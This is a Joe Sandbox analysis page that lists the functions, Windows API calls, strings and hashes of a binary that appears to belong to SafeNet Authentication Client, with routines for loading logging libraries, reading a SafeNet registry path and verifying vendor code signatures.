Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE ref: 00007FF79EE62F1B

Strings

., xrefs: 00007FF79EE62ED6
t, xrefs: 00007FF79EE62EE5
e, xrefs: 00007FF79EE62ED1
c, xrefs: 00007FF79EE62EC7
a, xrefs: 00007FF79EE62EC2
c, xrefs: 00007FF79EE62EBD
h, xrefs: 00007FF79EE62ECC
a, xrefs: 00007FF79EE62EE0
d, xrefs: 00007FF79EE62EDB

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: CreateFile
String ID: .$a$a$c$c$d$e$h$t
API String ID: 823142352-1751721336
Opcode ID: 78dcbe0fa1350bad73690e7ff7bc317abf9a3f9199edde4405f61649dc371aa2
Instruction ID: a04d9df29a0742d9e37f6a84bfbeff8eeaf9339bc19af62a23b40a917e5f9f93
Opcode Fuzzy Hash: 78dcbe0fa1350bad73690e7ff7bc317abf9a3f9199edde4405f61649dc371aa2
Instruction Fuzzy Hash: C301CC3214C7C085E321C625E45879FAE92E3E5748F484158E6C807B9ACBBED158CB61

Function 00007FF79EE64426 Relevance: 1.6, APIs: 1, Instructions: 54
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL ref: 00007FF79EE643F6

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: e1cf1cef11d6e5b6e6d072436e9ea9b3ecd07beef524207dc6198a4e55ac1695
Instruction ID: cea76687c2980f47981b038d28bd1f64d3f6003d9543409861e33f47b1965e2d
Opcode Fuzzy Hash: e1cf1cef11d6e5b6e6d072436e9ea9b3ecd07beef524207dc6198a4e55ac1695
Instruction Fuzzy Hash: 92217872609FC986DAB0DB15E4947AEB3A1F7C8B48F804026E68E87B58DF3CD455CB10

Function 00007FF79EE64360 Relevance: 1.5, APIs: 1, Instructions: 37
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL ref: 00007FF79EE643F6

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 6f0d3ed9ba89722752ecd01e58d2064350ee24b56a938eeae8ff7f1f9e4c9116
Instruction ID: 3063ff9dcac72147dc246e542ee7ddc26c63b9808ce4e9759947f7699b00a256
Opcode Fuzzy Hash: 6f0d3ed9ba89722752ecd01e58d2064350ee24b56a938eeae8ff7f1f9e4c9116
Instruction Fuzzy Hash: D7117576608EC586DAB0DB15E8543EEA3A1F7C8B49F808026D6CE87B58DF3CD559CB00

Function 00007FF79EE643BC Relevance: 1.5, APIs: 1, Instructions: 36
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL ref: 00007FF79EE643F6

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 7aa3e51b9b579c823f96398b602bb631d43326b4c54fd787193dff14d21a12c6
Instruction ID: 95148cb835efe0c0fc2ab737998ed064c7ba549f9f1b7bd060366ae090926041
Opcode Fuzzy Hash: 7aa3e51b9b579c823f96398b602bb631d43326b4c54fd787193dff14d21a12c6
Instruction Fuzzy Hash: A6017CB364D7C28FC7634F7098593CC3BB0E791B18F854466C38483686EA5C8A4ACB16

Function 00007FF79EE64364 Relevance: 1.5, APIs: 1, Instructions: 35
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL ref: 00007FF79EE643F6

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 3f404799c478e0384cfa94c630043f0069646ccfc839539ce29ae5eba2b41daf
Instruction ID: 9b7ace3d9df7d2d4f7cfabad5b2f33cf17edb0443a44964486f99bd020fbf1f1
Opcode Fuzzy Hash: 3f404799c478e0384cfa94c630043f0069646ccfc839539ce29ae5eba2b41daf
Instruction Fuzzy Hash: E5116372608AC586DAB0DB15E4543DEA3A1F7C8B49F808026D6CD87B58DF3DD559CB00

Non-executed Functions

Function 00007FF79EE6190C Relevance: 138.9, APIs: 44, Strings: 35, Instructions: 627
libraryloadertimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF79EE619D8
ProcessIdToSessionId.KERNEL32 ref: 00007FF79EE619E5
GetSystemDirectoryW.KERNEL32 ref: 00007FF79EE619F7
LoadLibraryW.KERNEL32 ref: 00007FF79EE61A29
GetProcAddress.KERNEL32 ref: 00007FF79EE61A4E
GetProcAddress.KERNEL32 ref: 00007FF79EE61A7A
GetProcAddress.KERNEL32 ref: 00007FF79EE61AA9
GetProcAddress.KERNEL32 ref: 00007FF79EE61ADB
FileTimeToLocalFileTime.KERNEL32 ref: 00007FF79EE61CA1
FileTimeToSystemTime.KERNEL32 ref: 00007FF79EE61CB0
StrStrIA.SHLWAPI ref: 00007FF79EE61D51
StrStrIA.SHLWAPI ref: 00007FF79EE61D65
StrStrIA.SHLWAPI ref: 00007FF79EE61D7C
StrStrIA.SHLWAPI ref: 00007FF79EE61D93
StrStrIA.SHLWAPI ref: 00007FF79EE61DAA
StrStrIA.SHLWAPI ref: 00007FF79EE61DBE
StrStrIA.SHLWAPI ref: 00007FF79EE61DD2
FreeLibrary.KERNEL32 ref: 00007FF79EE62339

Strings

szCertDesc, xrefs: 00007FF79EE61E81, 00007FF79EE6214E
CN=SentryBay Limited, xrefs: 00007FF79EE61DA0, 00007FF79EE61DC8, 00007FF79EE61DD7, 00007FF79EE61E53, 00007FF79EE6206D, 00007FF79EE62095, 00007FF79EE620A4, 00007FF79EE62120
WinVerifyTrust, xrefs: 00007FF79EE61A44
pwszSourceFile, xrefs: 00007FF79EE61961
Failed to load verification function, xrefs: 00007FF79EE62317
SignedBy, xrefs: 00007FF79EE61EB1, 00007FF79EE6217E
SACSRV, xrefs: 00007FF79EE62294
hLibWinTrust, xrefs: 00007FF79EE622B0
LogEvent, xrefs: 00007FF79EE62216
wTHelperGetProvSignerFromChain, xrefs: 00007FF79EE622F2
Certificate Description, xrefs: 00007FF79EE61E90, 00007FF79EE6215D
etVerifyEmbeddedSignature, xrefs: 00007FF79EE61944
dwMsgId, xrefs: 00007FF79EE62244
WTHelperGetProvCertFromChain, xrefs: 00007FF79EE61AD1
, xrefs: 00007FF79EE61B25
WTHelperGetProvSignerFromChain, xrefs: 00007FF79EE61A9F
dwLastError, xrefs: 00007FF79EE621D9
wTHelperGetProvCertFromChain, xrefs: 00007FF79EE62308
wTHelperProvDataFromStateData, xrefs: 00007FF79EE622DC
Signature Date, xrefs: 00007FF79EE61D0F, 00007FF79EE61FDC
CN=Gemalto, xrefs: 00007FF79EE61D47, 00007FF79EE61E03, 00007FF79EE62014, 00007FF79EE620D0
OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.2.5.4.15=Private Organization, SERIALNUMBER=2177038, C=US, S=Texas, L=Austin, O="Thales DIS CPL USA, Inc.", OU=Security Team, CN="Thales DIS CPL USA, Inc.", xrefs: 00007FF79EE61D72, 00007FF79EE61E2B, 00007FF79EE6203F, 00007FF79EE620F8
Tool_windows, xrefs: 00007FF79EE6194B
*status, xrefs: 00007FF79EE621EB
CN=Microsoft, xrefs: 00007FF79EE61D89, 00007FF79EE61E3F, 00007FF79EE62056, 00007FF79EE6210C
dwEventCategory, xrefs: 00007FF79EE6222C
szDate, xrefs: 00007FF79EE61D03, 00007FF79EE61FD0
lStatus, xrefs: 00007FF79EE621C4
winVerifyTrust, xrefs: 00007FF79EE622C6
WTHelperProvDataFromStateData, xrefs: 00007FF79EE61A70
SACEventsMsg, xrefs: 00007FF79EE6221D
%.2d/%.2d/%.4d at %.2d:%2.d:%.2d, xrefs: 00007FF79EE61CEB, 00007FF79EE61FB5
*signedBy, xrefs: 00007FF79EE61EA2, 00007FF79EE6216F
C=GB, xrefs: 00007FF79EE61DB4, 00007FF79EE61E67, 00007FF79EE62081, 00007FF79EE62134
CN="Gemalto, xrefs: 00007FF79EE61D5B, 00007FF79EE61E17, 00007FF79EE62028, 00007FF79EE620E4

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: AddressProcTime$File$LibraryProcessSystem$CurrentDirectoryFreeLoadLocalSession
String ID: $%.2d/%.2d/%.4d at %.2d:%2.d:%.2d$*signedBy$*status$C=GB$CN="Gemalto$CN=Gemalto$CN=Microsoft$CN=SentryBay Limited$Certificate Description$Failed to load verification function$LogEvent$OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.2.5.4.15=Private Organization, SERIALNUMBER=2177038, C=US, S=Texas, L=Austin, O="Thales DIS CPL USA, Inc.", OU=Security Team, CN="Thales DIS CPL USA, Inc."$SACEventsMsg$SACSRV$Signature Date$SignedBy$Tool_windows$WTHelperGetProvCertFromChain$WTHelperGetProvSignerFromChain$WTHelperProvDataFromStateData$WinVerifyTrust$dwEventCategory$dwLastError$dwMsgId$etVerifyEmbeddedSignature$hLibWinTrust$lStatus$pwszSourceFile$szCertDesc$szDate$wTHelperGetProvCertFromChain$wTHelperGetProvSignerFromChain$wTHelperProvDataFromStateData$winVerifyTrust
API String ID: 3383097823-1628687972
Opcode ID: e00f7c14864fa0bb5c73da33b60708c12e36a4378b27991268f24d1e7827fdec
Instruction ID: b3d43af7d3f9f6db06d8d2dd50f17e836aaab7c0c474457f3de3916e92d3d66f
Opcode Fuzzy Hash: e00f7c14864fa0bb5c73da33b60708c12e36a4378b27991268f24d1e7827fdec
Instruction Fuzzy Hash: E3525A65E08B4295FB26FB75A8C02BCA3A1AF49B84FC44035D90E46795EFFEA545C330

Function 00007FF79EE61000 Relevance: 45.6, APIs: 14, Strings: 12, Instructions: 87libraryloaderthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF79EE61025
GetModuleHandleA.KERNEL32 ref: 00007FF79EE61038
GetProcAddress.KERNEL32 ref: 00007FF79EE61068
GetProcAddress.KERNEL32 ref: 00007FF79EE6107F
GetProcAddress.KERNEL32 ref: 00007FF79EE61096
GetProcAddress.KERNEL32 ref: 00007FF79EE610AD
GetProcAddress.KERNEL32 ref: 00007FF79EE610C4
GetProcAddress.KERNEL32 ref: 00007FF79EE610DB
GetProcAddress.KERNEL32 ref: 00007FF79EE610F2
GetProcAddress.KERNEL32 ref: 00007FF79EE61109
GetProcAddress.KERNEL32 ref: 00007FF79EE61120
GetProcAddress.KERNEL32 ref: 00007FF79EE61137
GetCurrentThreadId.KERNEL32 ref: 00007FF79EE61171
Sleep.KERNEL32 ref: 00007FF79EE61188

Strings

etLogEnterFunction_PrepareEx, xrefs: 00007FF79EE6105E
etLogLevel, xrefs: 00007FF79EE61126
etLogLeaveFunction_Execute, xrefs: 00007FF79EE61085
etLogNumber, xrefs: 00007FF79EE610CA
etLogNumber64, xrefs: 00007FF79EE610E1
etLogEnterFunction_Execute, xrefs: 00007FF79EE6106E
etLogEnable, xrefs: 00007FF79EE6110F
SACLog, xrefs: 00007FF79EE61046
etLogStruct, xrefs: 00007FF79EE610F8
etLogBuffer, xrefs: 00007FF79EE610B3
etLogOutput_Execute, xrefs: 00007FF79EE6109C
SACLog.dll, xrefs: 00007FF79EE6102B

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: AddressProc$CurrentThread$HandleModuleSleep
String ID: SACLog$SACLog.dll$etLogBuffer$etLogEnable$etLogEnterFunction_Execute$etLogEnterFunction_PrepareEx$etLogLeaveFunction_Execute$etLogLevel$etLogNumber$etLogNumber64$etLogOutput_Execute$etLogStruct
API String ID: 1472845388-3083178291
Opcode ID: e31921e1464d1fa7d8278c51ae4d861cf079ee953e8f59e068f066425c208f75
Instruction ID: 26f45bd043d97c2efd0f0a533b93b784690d83ea0038024f1bafe2b92d3c46f3
Opcode Fuzzy Hash: e31921e1464d1fa7d8278c51ae4d861cf079ee953e8f59e068f066425c208f75
Instruction Fuzzy Hash: 2E419320E09B4791FB61AB30ADD4135E3B5AF59B90FC05236C94E127A4DFBEA8498371

Function 00007FF79EE68904 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF79EE6897D
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF79EE68995
RtlVirtualUnwind.KERNEL32 ref: 00007FF79EE689D0
IsDebuggerPresent.KERNEL32 ref: 00007FF79EE68A09
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF79EE68A13
UnhandledExceptionFilter.KERNEL32 ref: 00007FF79EE68A1E

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 8f81ef5b95c0aef8bc857c40ef85300e5a20296bb96a65bbfcc654eeed7dc8be
Instruction ID: 48ccd39f2cfb68700c343cf398be092938948214a14c6d3c7284149402069146
Opcode Fuzzy Hash: 8f81ef5b95c0aef8bc857c40ef85300e5a20296bb96a65bbfcc654eeed7dc8be
Instruction Fuzzy Hash: E3315136608F8196EB60DB35E8802AEB3A4FB88794F900135EA9D47B59DF79C545C720

Function 00007FF79EE69AE0 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF79EE69B2C
FindFirstFileExW.KERNEL32 ref: 00007FF79EE69C36

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: df6efaeddf0e48db297d64f0c349a0884ff7cf8aa40c648e3404ef4be5db85f7
Instruction ID: 15b9d0e0ac60d5269ccd7089d0e95560c8a8e4bcb68668a43fb315dcc1d5a716
Opcode Fuzzy Hash: df6efaeddf0e48db297d64f0c349a0884ff7cf8aa40c648e3404ef4be5db85f7
Instruction Fuzzy Hash: 7FB1A322B18E9241FB71AB3194801B9E391EB44FE4F845131EA5E47B89EFBEE441C330

Function 00007FF79EE6F908 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF79EE6FB57
RaiseException.KERNEL32 ref: 00007FF79EE6FB68

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 7228ce4ce12006dc947cbebbbd2aaf83b3b1ee7dc0ca82f5091a228243248154
Instruction ID: 0dcbe21fb6b965f2bdfed516fc6feabe014ad85d263bff8e4f7e72e125df322f
Opcode Fuzzy Hash: 7228ce4ce12006dc947cbebbbd2aaf83b3b1ee7dc0ca82f5091a228243248154
Instruction Fuzzy Hash: 68B15D73604B898BEB25DF39C48636C7BA0F744F88F588921DA6D837A8CB79D451C720

Function 00007FF79EE6C070 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF79EE6C074

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 18857e8c64a8535a8458861e2d065bc2adcbef9dd7f8d1379e6894ca19faf184
Instruction ID: eaf4e32d13da7957de060efd1c5ea2990bc75987a4f599ff51eb897b2deece4b
Opcode Fuzzy Hash: 18857e8c64a8535a8458861e2d065bc2adcbef9dd7f8d1379e6894ca19faf184
Instruction Fuzzy Hash: B3B09220E07B02C2FB183B216C8221462A4BF58741FC84038C10C51320DFAD24A55730

Function 00007FF79EE68178 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 80eebc2eb60c5440219c37660f99ae952dfccc309d9b8a0445fb2a4156dc9213
Instruction ID: a1d7fe6e6054aa5c707527075730fd43d088683192041777fdda8c525eaa0a40
Opcode Fuzzy Hash: 80eebc2eb60c5440219c37660f99ae952dfccc309d9b8a0445fb2a4156dc9213
Instruction Fuzzy Hash: 2641F422714E5981FF14DF3AD994169B3A1FB48FD4B899032DE4D87B58DE7DC0828324

Function 00007FF79EE6F750 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0b3de7b642a2e0e5ab20a991fbeef91c79f15637ba48c6bfba8e61b05c10c96
Instruction ID: affdf844e96c44999735167e3ab0a58d6b3b42d7354dfd98b6f4a0e914a55b26
Opcode Fuzzy Hash: c0b3de7b642a2e0e5ab20a991fbeef91c79f15637ba48c6bfba8e61b05c10c96
Instruction Fuzzy Hash: F2F06871B186558AEBA49F3CA48262A77D0F748380F908139D68DC3B04D77D94508F24

Function 00007FF79EE62648 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 190librarystringCOMMON

Download Yara Rule

APIs

lstrcpynA.KERNEL32 ref: 00007FF79EE626D7
PathFindExtensionA.SHLWAPI ref: 00007FF79EE626E4
lstrcmpiA.KERNEL32 ref: 00007FF79EE626F4
StrCatBuffA.SHLWAPI ref: 00007FF79EE6270F
MultiByteToWideChar.KERNEL32 ref: 00007FF79EE6273B
GetSystemDirectoryW.KERNEL32 ref: 00007FF79EE62749
PathAppendW.SHLWAPI ref: 00007FF79EE62761
PathFileExistsW.SHLWAPI ref: 00007FF79EE6276C
LoadLibraryW.KERNEL32 ref: 00007FF79EE627A3
GetModuleFileNameW.KERNEL32 ref: 00007FF79EE627D9
PathRemoveFileSpecW.SHLWAPI ref: 00007FF79EE627E4
PathAppendW.SHLWAPI ref: 00007FF79EE627F6
PathFileExistsW.SHLWAPI ref: 00007FF79EE62801
LoadLibraryW.KERNEL32 ref: 00007FF79EE62838
PathAppendW.SHLWAPI ref: 00007FF79EE6287D
PathFileExistsW.SHLWAPI ref: 00007FF79EE62888
LoadLibraryW.KERNEL32 ref: 00007FF79EE628BF

Part of subcall function 00007FF79EE6260C: GetProcAddress.KERNEL32 ref: 00007FF79EE6261C

GetLastError.KERNEL32 ref: 00007FF79EE628E2

Strings

., xrefs: 00007FF79EE6269C
libFullName, xrefs: 00007FF79EE628F0
.dll, xrefs: 00007FF79EE626ED, 00007FF79EE62701
LoadLibraryW error, xrefs: 00007FF79EE62910

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: Path$File$AppendExistsLibraryLoad$AddressBuffByteCharDirectoryErrorExtensionFindLastModuleMultiNameProcRemoveSpecSystemWidelstrcmpilstrcpyn
String ID: .$.dll$LoadLibraryW error$libFullName
API String ID: 4118506122-1858157028
Opcode ID: ec010e4102469dcaeaa101d418f3901254a1db6ed1e4da21206ed0a258b059db
Instruction ID: 82364e45c22708089bed54e32387d8b90bc8b22c940dcf9ab3aa68ae83df0ac0
Opcode Fuzzy Hash: ec010e4102469dcaeaa101d418f3901254a1db6ed1e4da21206ed0a258b059db
Instruction Fuzzy Hash: 24813121A19E8791FB71AB31D9842B9A361FF88B84F840035DE4D47699EF7DD909C730

Function 00007FF79EE62424 Relevance: 28.1, APIs: 5, Strings: 11, Instructions: 98registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00007FF79EE6249B
RegQueryValueExW.ADVAPI32 ref: 00007FF79EE624F0
PathAppendW.SHLWAPI ref: 00007FF79EE62532
PathAppendW.SHLWAPI ref: 00007FF79EE62553
RegCloseKey.ADVAPI32 ref: 00007FF79EE62563

Strings

Path, xrefs: 00007FF79EE624E9
RegOpenKeyEx(HKEY_LOCAL_MACHINE\SOFTWARE\SAFENET\AUTHENTICATION) error, xrefs: 00007FF79EE624B9
SOFTWARE\SAFENET\AUTHENTICATION, xrefs: 00007FF79EE62487
authneticatioinPath, xrefs: 00007FF79EE62570
generalSACPath, xrefs: 00007FF79EE62582
Tool_windows, xrefs: 00007FF79EE62446
SAC, xrefs: 00007FF79EE62528
platformSACPath, xrefs: 00007FF79EE62594
x64, xrefs: 00007FF79EE62549
RegQueryValueExW(Path) error, xrefs: 00007FF79EE6250E
getSacInstallPath, xrefs: 00007FF79EE6243C

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
